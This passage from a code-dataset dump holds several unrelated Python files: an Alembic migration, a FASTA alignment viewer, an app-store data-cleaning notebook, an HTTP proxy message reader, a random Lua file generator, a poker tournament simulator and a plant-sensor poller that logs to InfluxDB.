sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('utc_created', sa.DateTime(), nullable=True),\n    sa.Column('utc_updated', sa.DateTime(), nullable=True),\n    sa.Column('title', sa.String(length=64), nullable=True),\n    sa.Column('body_text', sa.Text(), 
nullable=False),\n sa.Column('view_count', sa.Integer(), nullable=True),\n sa.Column('category_id', sa.Integer(), nullable=False),\n sa.Column('author_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['author_id'], ['users.id'], ),\n sa.ForeignKeyConstraint(['category_id'], ['categories.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_articles_title'), 'articles', ['title'], unique=False)\n op.create_table('article_tags',\n sa.Column('tag_id', sa.Integer(), nullable=False),\n sa.Column('article_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['article_id'], ['articles.id'], ),\n sa.ForeignKeyConstraint(['tag_id'], ['tags.id'], ),\n sa.PrimaryKeyConstraint('tag_id', 'article_id')\n )\n op.create_table('comments',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('utc_created', sa.DateTime(), nullable=True),\n sa.Column('utc_updated', sa.DateTime(), nullable=True),\n sa.Column('body_text', sa.String(length=200), nullable=False),\n sa.Column('is_enable', sa.Boolean(), nullable=True),\n sa.Column('author_id', sa.Integer(), nullable=True),\n sa.Column('article_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['article_id'], ['articles.id'], ),\n sa.ForeignKeyConstraint(['author_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('comments')\n op.drop_table('article_tags')\n op.drop_index(op.f('ix_articles_title'), table_name='articles')\n op.drop_table('articles')\n op.drop_table('users')\n op.drop_index(op.f('ix_tags_name'), table_name='tags')\n op.drop_table('tags')\n op.drop_table('roles')\n op.drop_index(op.f('ix_categories_name'), table_name='categories')\n op.drop_table('categories')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/eb1e026f5376_.py","file_name":"eb1e026f5376_.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"493577875","text":"#!/usr/bin/env python\n\n'''\n1. fasta alignment\n2. color bases? (y/n)\n3. mask matching bases? 
(y/n)\n'''\n\n\nfrom sys import argv, exit\nfrom Bio import SeqIO\nfrom os import system, popen\n\n\ntry:\n    fname = argv[1]\n    color = argv[2].upper()\n    mask = argv[3].upper()\nexcept:\n    exit(__doc__)\n\nf = open(fname, 'r')\nrecords = SeqIO.parse(f, 'fasta')\n\nref = []\ndic = {}\nmaxSeqNameLen = 0\ni = 0\nfor record in records:\n    seqName = record.description\n    seqShortName = record.id\n    sequence = record.seq\n    dic[seqName] = sequence\n    if i == 0:\n        ref = [seqShortName, sequence]\n    if len(seqShortName) > maxSeqNameLen:\n        maxSeqNameLen = len(seqShortName)\n\n    if mask.upper() == 'Y':\n        maskedSeq = ''\n        for pos in range(len(sequence)):\n            base = sequence[pos]\n            if base.upper() == ref[1][pos].upper() and not base == '-':\n                base = '.'\n            maskedSeq += base\n        dic[seqName] = maskedSeq\n\n    i += 1\nf.close()\n\n\n## display settings\n# set name width\nif maxSeqNameLen < 50:\n    tagWidth = maxSeqNameLen\nelse:\n    tagWidth = 50\nalnLen = len(ref[1])\n\n# automatic window size\noutputH, outputW = popen('stty size', 'r').read().split()\nwindowSize = int(outputW) - tagWidth - 8\n\n\n# start drawing\nwindowStart = 0\nwhile windowStart < alnLen:\n    windowEnd = windowStart + windowSize\n    if windowEnd > alnLen:\n        windowEnd = alnLen\n\n    offset = windowEnd - windowStart - len(str(windowStart)) - len(str(windowEnd))\n    print(\"%*s\\t%s\"%(tagWidth, \"Pos\", windowStart + 1) + ' '*offset + str(windowEnd))\n    print(\"%*s\\t%s\"%(tagWidth, \"Ref\", ref[1][windowStart:windowEnd]))\n\n    for seqName in dic:\n        sequence = dic[seqName]\n        frag = sequence[windowStart:windowEnd]\n        coloredFrag = str(frag).upper()\\\n.replace('A','\\033[43mA\\033[0m')\\\n.replace('T','\\033[44mT\\033[0m')\\\n.replace('C','\\033[45mC\\033[0m')\\\n.replace('G','\\033[46mG\\033[0m')\n        if color.upper() == 'Y' or color.upper() == 'YES':\n            print(\"%*s\\t%s\"%(tagWidth, seqName[:tagWidth], coloredFrag))\n        else:\n            print(\"%*s\\t%s\"%(tagWidth, seqName[:tagWidth], frag))\n\n    windowStart = windowEnd\n    print(\"\\n\")\n","sub_path":"fastaProcessing/fastaAlnView.py","file_name":"fastaAlnView.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"622207360","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # First Project - Dataquest.io\n# \n# **The project is about:**\n# App usage in the 'Google Play store' and the 'App Store'.\n# \n# **The project goal is:**\n# The goal is to help our developers understand what type of apps are likely to attract more users.\n\n# In[1]:\n\n\nfrom csv import reader\nopened_file = open('AppleStore.csv')\nread_file = reader(opened_file)\napple = list(read_file)\napple_header = apple[0]\napple_base = apple[1:]\n\nopened_file_b = open('googleplaystore.csv')\nread_file_b = reader(opened_file_b)\ngoogle = list(read_file_b)\ngoogle_header = google[0]\ngoogle_base = google[1:]\n\n\n\n# ## Data exploration\n\n# In[2]:\n\n\ndef explore_data(dataset, start, end, rows_and_columns=False):\n    dataset_slice = dataset[start:end] \n    for row in dataset_slice:\n        print(row)\n        print('\\n') # adds a new (empty) line after each row\n\n    if rows_and_columns:\n        print('Number of rows:', len(dataset))\n        print('Number of columns:', len(dataset[0]))\n\n\n# In[3]:\n\n\napple_expl = explore_data(apple, 0, 5)\n\n\n# In[4]:\n\n\ngoogle_expl = explore_data(google,0,5)\n\n\n# In[5]:\n\n\n# print the first rows of both data sets to identify the different variables\nprint(apple[0:1])\nprint('\\n')\nprint(google[0:1])\n\n\n# In[6]:\n\n\n# select what variables are suitable for 
analysis\n\n\n# # Data Cleaning\n\n# According to the discussion section of the Google Play data set, entry 10472 has a missing rating causing the columns to shift; let's check this out:\n\n# In[7]:\n\n\nprint(google[0])\nprint(google[10473])\n\n\n# The row is missing the data for the 'category' variable. The easiest solution is to just remove the record altogether since we can't fill in the category ourselves with the usual methods such as average, mean etc.\n\n# In[8]:\n\n\ndel google[10473]\n\n\n# Let us now look into the applestore data.\n# \n# In the discussion forum of the Applestore data set, note is made about an extra column in the header row. Let's investigate this further.\n\n# In[9]:\n\n\nprint(apple[0:2])\n\n\n# In[10]:\n\n\nprint(len(apple[0]))\nprint(len(apple[6]))\n\n\n# As we can clearly see based on the lengths of the header row and row 7, there is no difference in length. We checked this for several records and no difference was found, so we can conclude that this issue, mentioned in the discussion, has already been resolved in the version of the dataset that we are using.\n\n# In[11]:\n\n\nduplicate_apps_google = []\nunique_apps_google = []\n\nfor i in google[1:]:\n    name = i[0]\n    if name in unique_apps_google:\n        duplicate_apps_google.append(name)\n    else:\n        unique_apps_google.append(name)\nprint('Number of duplicate apps: ', len(duplicate_apps_google))\nprint('\\n')\nprint('Number of unique apps: ', len(unique_apps_google))\n\n\n# In[12]:\n\n\nduplicate_apps_apple = []\nunique_apps_apple = []\n\nfor j in apple[1:]:\n    track = j[1]\n    if track in unique_apps_apple:\n        duplicate_apps_apple.append(track)\n    else:\n        unique_apps_apple.append(track)\nprint('Number of duplicate apps: ', len(duplicate_apps_apple))\nprint('\\n')\nprint('Number of unique apps: ', len(unique_apps_apple))\n\n\n# By looking at the result of the previous two code blocks we know that there are a lot of duplicates. When we try to perform analysis, these duplicates will influence our results, so we should remove them. We could remove duplicates at random, but there are probably some differences in rating, version or another variable. We should think of a criterion for removing the duplicates.\n\n# In[13]:\n\n\nprint(duplicate_apps_google[0:4])\n\n\n# In[14]:\n\n\nprint(duplicate_apps_apple)\n\n\n# In[15]:\n\n\ndef print_duplicate(datas,app_name):\n    for app in datas:\n        name = app[0]\n        if name == app_name:\n            print(app)\n    \n\n\n# In[16]:\n\n\nPDF_scan = print_duplicate(google,'Quick PDF Scanner + OCR FREE')\n\n\n# The check above shows us that there are multiple exact duplicates in the google dataset. In order to remove these, we should first determine what criteria to use. In case there is a difference in last_version date or last update, this could show which record is most recent. Best practice would be to only take the most recent version into account.\n\n# For the apple dataset we don't have any dates to use, so we could look into\n# the number of installs to get an idea of which record we should retain and which\n# duplicates to remove.\n\n# Below we will remove the duplicates from the 'google' dataset. We will go about this by creating a dictionary. Dictionaries, by definition, can only contain unique keys. In order to be able to hash a list of lists into a dictionary we need to prepare it first. This means taking out the attribute we will use as a key (the app name) and keeping the important information, in our case the number of reviews. 
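Each app name will then map to its highest review count. 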
Because the record with the most reviews will give you the most information (more rating = more accurate)\n\n# In[17]:\n\n\nreviews_max = {} #create empty dictionary\nfor app in google[1:]:\n name = app[0] #name of the app\n n_reviews = float(app[3]) #number of reviews in float format\n # first check if name of app is already in our dictionary and if so \n # check if the number of reviews for the record in the dictionary\n # is greater than the number of ratings from the now read record\n if name in reviews_max and reviews_max[name] < n_reviews: \n reviews_max[name] = n_reviews\n elif name not in reviews_max:\n reviews_max[name] = n_reviews\n \nlen(reviews_max)\n \n \n\n\n# In[18]:\n\n\nreviews_max\n\n\n# In[19]:\n\n\ngoogle_clean = []\nalready_added = []\n\nfor app in google[1:]:\n name = app[0]\n n_reviews = float(app[3])\n if n_reviews == reviews_max[name] and name not in already_added:\n google_clean.append(app)\n already_added.append(name)\n \n \n\n\n# In[20]:\n\n\nlen(google_clean) #to check if we have the same number of records as previously \n\n\n# In[21]:\n\n\ngoogle_clean[0][0]\n\n\n# In[22]:\n\n\n# Mannequin Challenge', 'VR Roller Coaster'\nfor track in apple[1:]:\n if track[1] == 'Mannequin Challenge':\n print(track)\n print('\\n')\n elif track[1] == 'VR Roller Coaster':\n print(track)\n print('\\n')\n\n\n# In[23]:\n\n\n# apple total rating count = [5]\nratings_max = {} #create empty dictionary\nfor track in apple[1:]:\n name = track[1] #name of the app\n n_ratings = float(track[5]) #number of ratings in float format\n # first check if name of app is already in our dictionary and if so \n # check if the number of reviews for the record in the dictionary\n # is greater than the number of ratings from the now read record\n if name in ratings_max and ratings_max[name] < n_ratings: \n ratings_max[name] = n_ratings\n elif name not in ratings_max:\n ratings_max[name] = n_ratings\n \nlen(ratings_max)\n\n\n# In[24]:\n\n\napple_clean = []\nalready_in_apple = []\n\nfor track in apple[1:]:\n name = track[1]\n n_ratings = float(track[5])\n if n_ratings == ratings_max[name] and name not in already_in_apple:\n apple_clean.append(track)\n already_in_apple.append(name)\nprint(' the amount of records in the clean data set: ',len(apple_clean)) \nprint('\\n')\nprint(apple_clean[0:5])\n\n\n# We only want to focus on English apps. In order to identify the apps with names not belonging to the english language, we can use the ASCII code. The numbers corresponding to the characters we commonly use in an English text are all in the range 0 to 127, according to the ASCII (American Standard Code for Information Interchange) system. 
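Characters with code points above 127 (accented letters, CJK text, emoji and so on) fall outside this common English range. 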
Based on this number range, we can build a function that detects whether a character belongs to the set of common English characters or not.\n\n# In[25]:\n\n\ndef english_check(string):\n    count_weird = 0\n    for a in string:\n        if ord(a) > 127:\n            count_weird += 1\n    if count_weird > 3:\n        return False\n    return True\n    \n\nTest2 = english_check('爱奇艺PPS -《欢乐颂2》电视剧热播')\nTest3 = english_check('Docs To Go™ Free Office Suite')\n\n\nprint(Test2)\nprint(Test3)\n\n\n\n# In[26]:\n\n\ngoogle_eng = []\n\n\nfor item in google_clean:\n    x = english_check(item[0])\n    if x:\n        google_eng.append(item)\n    \n\n\n# In[27]:\n\n\ngoogle_eng[0]\n\n\n# In[28]:\n\n\nprint(len(google_eng))\n\n\n# In[29]:\n\n\napple_eng = []\nfor item in apple_clean:\n    x = english_check(item[1])\n    if x:\n        apple_eng.append(item)\n\n\n# In[30]:\n\n\napple_eng[0:2]\n\n\n# In[31]:\n\n\nfinal_apple = []\nfor i in apple_eng:\n    if float(i[4]) == 0:\n        final_apple.append(i)\n    \n\n\n# In[32]:\n\n\nprint('The total number of apps after cleaning:',len(apple_clean))\nprint('The number of free apps: ', len(final_apple))\n\n\n# In[33]:\n\n\ngoogle_eng[1]\n\n\n# In[34]:\n\n\nfinal_google = []\nfor i in google_eng:\n    if i[6] == 'Free':\n        final_google.append(i)\n\n\n# In[35]:\n\n\nprint('The total number of apps after cleaning:',len(google_eng))\nprint('The number of free apps: ', len(final_google))\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"App store comparison - cleaning done.py","file_name":"App store comparison - cleaning done.py","file_ext":"py","file_size_in_byte":8915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"419245964","text":"\nimport re\n\nfrom proxy.logger import logger, logerror, logstate\n\nclass MessageReader(object):\n    \"\"\"The base class for reading an HTTP message from a socket\"\"\"\n\n    def message(self):\n        return self._message\n    \n    def header(self):\n        return self._header\n\n    def ok(self):\n        return self._ok\n\n    def timeout(self):\n        return self._timeout\n\n    def tail(self):\n        return self._tail\n\n    def __init__(self, stream, pipeline_tail=b\"\"):\n        self._message = pipeline_tail \n        self._header = b\"\"\n        self._ok = False\n        self._timeout = False\n        self._tail = b\"\"\n\n        BUF_SIZE_SMALL = 50 \n        BUF_SIZE = 4096\n        first = True\n        abort = False\n        chunked = False\n        while 1:\n            logstate(\"readhdr\")\n            try:\n                chunk = stream.recv(BUF_SIZE_SMALL)\n            except OSError as errv:\n                self._ok = False\n                self._timeout = not self._message\n                logerror(\"Message read failed (1) %s \" % str(errv))\n                logstate(str(errv))\n                return\n            except Exception:\n                raise\n            # an empty chunk means the client shut down\n            if not chunk:\n                abort = True\n                break\n            # occasional blank lines in the beginning should be ignored\n            if (first):\n                chunk = chunk.lstrip(b\"\\r\\n\")\n                chunk = chunk.lstrip(b\"\\n\")\n                first = False\n            self._message += chunk\n            # empty line at the end means end of the header section. 
We only handle GET, without a body, so stop here\n match = re.search(b\"(\\r\\n\\r\\n|\\n\\n)\", self._message);\n if match:\n logstate(\"match\")\n break\n logstate(\"notmatch\")\n\n if abort or b\"HTTP\" not in self._message:\n self._ok = False\n self._timeout = not self._message\n return\n\n\n self._header = self._message[:match.start()]\n bodycount = len(self._message[match.end():])\n matchContent = re.search(b\"^content-length:\\s+(\\d+)\", self._header, re.IGNORECASE | re.MULTILINE)\n #value is not important: chunked coding should be always included and applied the last\n matchTransfer = re.search(b\"^transfer-encoding:\\s+\", self._header, re.IGNORECASE | re.MULTILINE)\n #if present, content-length is ignored\n if matchTransfer: \n chunked = True\n elif matchContent:\n chunked = False\n contentLength = int(matchContent.group(1))\n else:\n #_message without body\n self._ok = True\n self._tail = self._message[match.end():]\n return\n\n\n chunk = b\"\" \n try:\n if chunked:\n while 1: \n matchTransferEnd = re.search(b\"0\\r\\n(.*\\r\\n)?\\r\\n\", self._message[len(self._header):])\n if matchTransferEnd:\n self._ok = True\n break\n logstate(\"readbody ch\")\n chunk = stream.recv(BUF_SIZE)\n if not chunk:\n self._ok = False\n break\n self._message += chunk\n else:\n\n while 1:\n bodycount += len(chunk)\n if bodycount == contentLength:\n self._ok = True\n break\n logstate(\"readbody cl\")\n if contentLength - bodycount >= BUF_SIZE:\n chunk = stream.recv(BUF_SIZE)\n else:\n chunk = stream.recv(contentLength - bodycount)\n if not chunk:\n self._ok = False\n break\n self._message += chunk\n except OSError as value:\n logerror(\"Message read failed (2) \")\n logerror(str(value))\n self._ok = False\n self._timeout = not self._message\n \n @staticmethod \n def set_keep_alive(message, size, keep_alive):\n search_in = message[:size]\n matchConn = re.search(b\"^connection:\\s+.*$\", search_in, re.IGNORECASE | re.MULTILINE)\n if matchConn:\n return message[:matchConn.start()] + b\"connection: \" + (b\"keep-alive\" if keep_alive else b\"close\") + message[matchConn.end():]\n else:\n return message\n","sub_path":"proxy/message_reader.py","file_name":"message_reader.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"504070798","text":"import string\nimport random\nimport os\nimport zipfile\n\ndef chuangjian(myaname):\n wenname = []\n k = 1\n while (k <= 10):\n def shouzimu(size=1, chars=string.ascii_uppercase):\n return ''.join(random.choice(chars) for _ in range(size))\n\n def wenjianname(size=random.randrange(4, 15), chars=string.ascii_uppercase):\n return ''.join(random.choice(chars) for _ in range(size))\n\n name = wenjianname()\n name = str(name)\n name = name.lower()\n tou = shouzimu()\n curPath = os.getcwd()\n targetPath = curPath + os.path.sep\n\n if not os.path.exists(targetPath):\n os.makedirs(targetPath)\n fileName = tou + name + myaname + '.lua'\n wenname.append(fileName)\n filePath = targetPath + os.path.sep + fileName\n\n with open(filePath, 'a') as f:\n for i in range(1, 800):\n def neirong(size=random.randrange(60, 90), chars=string.ascii_uppercase + string.digits):\n return ''.join(random.choice(chars) for _ in range(size))\n\n def bianliang(size=random.randrange(4, 15), chars=string.ascii_uppercase):\n return ''.join(random.choice(chars) for _ in range(size))\n\n nrong = neirong()\n name1 = bianliang()\n name2 = bianliang()\n name3 = bianliang()\n f.write('local' + ' ' + name1 + '=' + 
'\\'' + nrong + '\\'' + ';' + '\\n')\n                if i % 8 == 0:\n                    f.write('function' + ' ' + name2 + '()' + 'end' + '\\n')\n                if i % 5 == 0:\n                    f.write('print' + '(' + '\\'' + name3 + '\\'' + ')' + '\\n')\n        k = k + 1\n    wenjianname = 'jilu' + '.txt'\n    wenjianpath = targetPath + os.path.sep + wenjianname\n    with open(wenjianpath, 'a') as h:\n        for _ in wenname:\n            h.write(_ + ',')\n\ndef shanchu():\n    curPath_s = os.getcwd()\n    path111 = curPath_s + '\\\\' + 'jilu.txt'\n    with open(path111, 'r') as m:\n        names = m.read().split(',')\n    l = 0\n    while(l < (len(names)-1)):\n        shanwenjian = curPath_s + '\\\\' + names[l]\n        os.remove(shanwenjian)\n        l = l + 1\n    os.remove(path111)\n\ndef yasuo(name_yasuo):\n    name = name_yasuo + '.zip'\n    azip = zipfile.ZipFile(name, 'w')\n    curPath_s = os.getcwd()\n    for filesname in os.walk(curPath_s):\n        for file in filesname[len(filesname) - 1]:\n            parts = file.split('.')\n            if len(parts) == 2 and parts[1] == \"lua\":\n                azip.write(file)\n    azip.close()\n\n\n# main script\ntils = []\nstrttt = str(input('Enter names (separate several names with spaces; leave empty to generate the default files): '))\nif len(strttt) == 0:\n    tils = ['Service', 'Model', 'Entity', 'Command', 'Controller']\nelse:\n    tils = strttt.split(' ')\n\nfor it in tils:\n    chuangjian(it)\n    yasuo(it)\n\nkey = int(input('Enter 1 to delete the created files and finish, anything else to keep them: '))\nif key == 1:\n    shanchu()\nelse:\n    print('over')","sub_path":"Try_try.py","file_name":"Try_try.py","file_ext":"py","file_size_in_byte":3016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"556940891","text":"from observer import Observer\nfrom simpleAI import SimpleAI\nfrom gameinfo import GameInfo\nfrom gametable import Gametable\n\nfrom deuces import Card, Evaluator\nfrom deck import Deck\n\nclass RoundState():\n    PREFLOP = 0\n    FLOP = 1\n    TURN = 2\n    RIVER = 3\n\n\nclass Tournament(Gametable):\n    \n    BLIND_INCREMENTS = [[10,25],[25,50],[50,100],[75,150],[100,200],[150,300],[200,400],[300,600],[400,800],[500,1000],[600,1200],[800,1600],[1000,2000]]\n    \n    def __init__(self,quiet):\n        \n        self._quiet = quiet\n        self.gameinfo = GameInfo()\n        self.gameinfo._players = []\n        self.gameinfo._seats = []\n        self.gameinfo._max_seats = 3\n        self.gameinfo._emptyseats = 0\n        self.gameinfo._button = 0\n        [ self.gameinfo._smallblind, self.gameinfo._bigblind] = Tournament.BLIND_INCREMENTS[0]\n\n        self._bankroll=[]\n        \n        #hands and level\n        self.gameinfo._num_of_hands=0\n        self.gameinfo._level=0\n        \n        #small blind&big blind\n        [self.gameinfo._smallblind,self.gameinfo._bigblind]=[0,0]\n        \n        #pots\n        self.gameinfo._side_pots = [0] * self.gameinfo._max_seats\n        self.gameinfo._totalpot=0\n        \n        #cards\n        self._deck = None\n        \n        self.gameinfo._round=0\n        self.gameinfo._board=[]\n        self.gameinfo._hands=[]\n        \n        #betting state\n        self.gameinfo._tocall=0\n        self.gameinfo._lastraise = 0\n        \n\n\n    def register_player(self, player):\n        if player not in self.gameinfo._players:\n            self.gameinfo._players.append(player)\n\n    def unregister_player(self, player):\n        if player in self.gameinfo._players:\n            self.gameinfo._players.remove(player)\n\n    def unregister_all(self):\n        if self.gameinfo._players:\n            del self.gameinfo._players[:]\n\n    def notify_players(self, *args, **kwargs):\n        for player in self.gameinfo._players:\n            player.update(self.gameinfo)\n\n    def process_players_action(self):\n        for player in self.players:\n            player.getAction()\n    def new_round(self,players):\n        for player in players:\n            player.currentbet = 0\n            player.playedthisround = False\n        self.gameinfo._round += 1\n        self.gameinfo._tocall = 0\n        self.gameinfo._lastraise = 0\n\n    def _first_to_act(self,players):\n        try:\n            first = [player for player 
in players if player.get_seat() > self.gameinfo._button][0]\n        except IndexError:\n            first = players[0]\n        return first\n    def post_smallblind(self,players):\n        pass\n    def post_bigblind(self,players):\n        pass\n    def _next(self, players, current_player):\n        idx = players.index(current_player)\n        return players[(idx+1) % len(players)]\n    def deal(self,players):\n        for player in players:\n            if player.playing_hand:\n                player.hand = self._deck.get_hands()\n                if not self._quiet:\n                    print('Player:{} Get:{}'.format(player.playerID,self._deck.card_to_str(player.hand)))\n    def flop(self):\n        self.gameinfo._board = self._deck.get_flop()\n        if not self._quiet:\n            print('Flop:{}'.format(self._deck.card_to_str(self.gameinfo._board)))\n    \n    def turn(self):\n        turn = self._deck.get_turn()\n        self.gameinfo._board.extend(turn)\n        \n        if not self._quiet:\n            print('Turn:{}'.format(self._deck.card_to_str(self.gameinfo._board)))\n    def river(self):\n        river = self._deck.get_river()\n        self.gameinfo._board.extend(river)\n        if not self._quiet:\n            print('River:{}'.format(self._deck.card_to_str(self.gameinfo._board)))\n\n    def player_bet(self, player, total_bet):\n        pass\n    \n    def start_hand(self,players):\n        \n        players = [p for p in players if p.playing_hand]\n        #assert sum([p.stack for p in players]) == 2000*len(self.gameinfo._seats)\n        #shuffle deck\n        self._deck = Deck()\n        self.new_round(players)\n        self.gameinfo._round=0\n        \n        self.notify_players()\n        \n        \n        player = self._first_to_act(players)\n        print([player.playerID for player in players])\n        print('Small blind:{}'.format(player.playerID))\n        self.post_smallblind(player)\n        player = self._next(players, player)\n        print('Big blind:{}'.format(player.playerID))\n        self.post_bigblind(player)\n        player = self._next(players, player)\n        print('Btn:{}'.format(player.playerID))\n        self.gameinfo._tocall = self.gameinfo._bigblind\n        \n        # rounds\n        self.gameinfo._round = 0\n        \n        #Deal cards\n        while self.gameinfo._round<4 and len(players)>1:\n            if self.gameinfo._round == 0:\n                self.deal(players)\n            elif self.gameinfo._round == 1:\n                self.flop()\n            elif self.gameinfo._round == 2:\n                self.turn()\n            elif self.gameinfo._round == 3:\n                self.river()\n            \n            self.gameinfo._folded_players = []\n            \n            while not player.playedthisround and len([p for p in players if not p.isallin]) >=1:\n                if player.isallin:\n                    # print('player ', player.playerID, 'is all in, skipping their turn')\n                    player = self._next(players, player)\n                    continue\n                \n                action = player.get_action()\n                player.playedthisround = True\n\n                if action[0] == 'call':\n                    self.player_bet(player, self.gameinfo._tocall)\n                    if not self._quiet:\n                        print('Player', player.playerID, action)\n                    player = self._next(players, player)\n                elif action[0] == 'check':\n                    self.player_bet(player, player.currentbet)\n                    if not self._quiet:\n                        print('Player', player.playerID, action)\n                    player = self._next(players, player)\n                elif action[0] == 'bet':\n                    self.player_bet(player, action[1]+player.currentbet)\n                    if not self._quiet:\n                        print('Player', player.playerID, action)\n                    for p in players:\n                        if p != player:\n                            p.playedthisround = False\n                    player = self._next(players, player)\n                elif action[0] == 'fold':\n                    player.playing_hand = False\n                    folded_player = player\n                    if not self._quiet:\n                        print('Player', player.playerID, action)\n                    player = self._next(players, player)\n                    players.remove(folded_player)\n                    self.gameinfo._folded_players.append(folded_player)\n                # break if a single player left\n                if len(players) ==1:\n                    break\n                player = self._first_to_act(players)\n            self.resolve_sidepots(players + self.gameinfo._folded_players)\n            self.new_round(players)\n            if not self._quiet:\n                
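# Log the running pot total once this street's betting has resolved.\n                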
print('totalpot', self.gameinfo._totalpot)\n \n #assert sum([p.stack for p in self._seats]) + self._totalpot == 2000*len(self._seats)\n \n # print('requesting action from ',player.playerID)\n \n self.new_round(players)\n \n \n def increment_blinds(self):\n self.gameinfo._level = min(self.gameinfo._level+1,len(Tournament.BLIND_INCREMENTS)-1)\n [self.gameinfo._smallblind, self.gameinfo._bigblind] = Tournament.BLIND_INCREMENTS[self.gameinfo._level]\n \n def run_game(self):\n #First hand\n self.gameinfo._num_of_hands = 1\n self.gameinfo._level = 0\n #First level small blind & big blind\n [self.gameinfo._smallblind, self.gameinfo._bigblind] = Tournament.BLIND_INCREMENTS[self.gameinfo._level]\n \n #players' initial stack\n for player in self.gameinfo._players:\n player.stack = 2000\n player.playing_hand = True\n \n #seated players\n self.gameinfo._seats = self.gameinfo._players\n # keep playing until there's a single player (shotgun style)\n while( self.gameinfo._emptyseats < len(self.gameinfo._seats)-1 and self.gameinfo._num_of_hands<1000):\n #start a new hand\n self.start_hand(self.gameinfo._seats)\n input('Press Enter to deal the next hand')\n #count of hands +1\n self.gameinfo._num_of_hands += 1\n #print log\n if not self._quiet:\n print('Starting game new hands: ', self.gameinfo._num_of_hands)\n print('level:{} SB:{} BB:{}'.format(self.gameinfo._level,self.gameinfo._smallblind,self.gameinfo._bigblind))\n for p in self.gameinfo._seats:\n if p.playing_hand:\n print('Player ',p.playerID, ' stack size: ', p.stack)\n \n # increment blinds every 15 hands (based on avg hands/hour of 30); increment_blinds already advances _level\n if (self.gameinfo._num_of_hands % 15) == 0 and self.gameinfo._num_of_hands < 1000:\n self.increment_blinds()\n\n\n\nif __name__ == \"__main__\":\n tournament1 = Tournament(quiet=0)\n player1 = SimpleAI(playerID=\"LuYang\")\n player2 = SimpleAI(playerID=\"TianXiang\")\n player3 = SimpleAI(playerID=\"AI\")\n tournament1.register_player(player1)\n tournament1.register_player(player2)\n tournament1.register_player(player3)\n tournament1.run_game()\n#gametable.play()\n\n\n","sub_path":"game/tournament.py","file_name":"tournament.py","file_ext":"py","file_size_in_byte":9668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"337679490","text":"#!/usr/bin/env python3\n\"\"\"Demo file showing how to use the miflora library.\"\"\"\n\nimport re\nimport requests\nfrom btlewrap import available_backends, BluepyBackend, GatttoolBackend, PygattBackend, base\n\nfrom miflora.miflora_poller import MiFloraPoller, \\\n MI_CONDUCTIVITY, MI_MOISTURE, MI_LIGHT, MI_TEMPERATURE, MI_BATTERY\n\nfrom config import *\nfrom influxdb import InfluxDBClient\nimport json\nimport os\n\ntry:\n db_client = InfluxDBClient(*influx_args)\nexcept ValueError:\n print(\"InfluxDBClient init failed. 
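# A minimal standalone sketch of the blind-schedule logic from increment_blinds() in
# tournament.py above: the level index is clamped with min() so it can never run past
# the last defined blind pair. The shortened BLIND_INCREMENTS here is illustrative only.
BLIND_INCREMENTS = [[10, 25], [25, 50], [50, 100]]

def next_blinds(level):
    # Advance one level but stay within the table.
    level = min(level + 1, len(BLIND_INCREMENTS) - 1)
    return level, BLIND_INCREMENTS[level]

assert next_blinds(0) == (1, [25, 50])
assert next_blinds(99) == (2, [50, 100])  # clamped at the final level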
Check config!\")\nbackend = None\nclear_hosts = []\njson_filename = '.cached_data'\n# Check if data was cached and load it\ntry:\n with open(json_filename,'r') as json_file:\n json_body = json.load(json_file)\nexcept Exception:\n json_body = []\n\ndef valid_miflora_mac(mac, pat=re.compile(r\"C4:7C:8D:[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2}\")):\n \"\"\"Check for valid MAC addresses.\"\"\"\n if not pat.match(mac.upper()):\n raise TypeError('The MAC address \"{}\" seems to be in the wrong format'.format(mac))\n return mac\n\n\ndef poll(mac, hostname):\n \"\"\"Poll data from the sensor.\"\"\"\n global json_body\n poller = MiFloraPoller(mac, backend)\n try:\n measurement = {\n \"measurement\": \"monitor_reading\",\n \"tags\": {\n \"monitor\": hostname\n },\n \"time\": int(poller._fetch_device_time()[1]),\n \"fields\": {\n \"firmware\": poller.firmware_version(),\n \"battery\": poller.parameter_value(MI_BATTERY),\n \"temperature\": poller.parameter_value(MI_TEMPERATURE),\n \"moisture\": poller.parameter_value(MI_MOISTURE),\n \"light\": poller.parameter_value(MI_LIGHT),\n \"conductivity\": poller.parameter_value(MI_CONDUCTIVITY)\n }\n }\n json_body.append(measurement)\n except Exception as e:\n print(str(e))\n\n\ndef history(mac, hostname):\n \"\"\"Read the history from the sensor.\"\"\"\n global json_body\n global clear_hosts\n temp = []\n poller = MiFloraPoller(mac, backend)\n history_list = poller.fetch_history()\n for entry in history_list:\n measurement = {\n \"measurement\": \"monitor_reading\",\n \"tags\": {\n \"monitor\": hostname\n },\n \"time\": int(entry.wall_time.timestamp()),\n \"fields\": {\n \"temperature\": entry.temperature,\n \"moisture\": entry.moisture,\n \"light\": entry.light,\n \"conductivity\": entry.conductivity\n }\n }\n temp.append(measurement)\n if len(history_list) == len(temp) and not len(history_list) == 0:\n for item in temp:\n json_body.append(item)\n clear_hosts.append(hostname)\n\n\ndef clear_history(mac):\n \"\"\"Clear the sensor history.\"\"\"\n poller = MiFloraPoller(mac, backend)\n poller.clear_history()\n\n\ndef _get_backend(config_backend):\n \"\"\"Extract the backend class from the command line arguments.\"\"\"\n if config_backend == 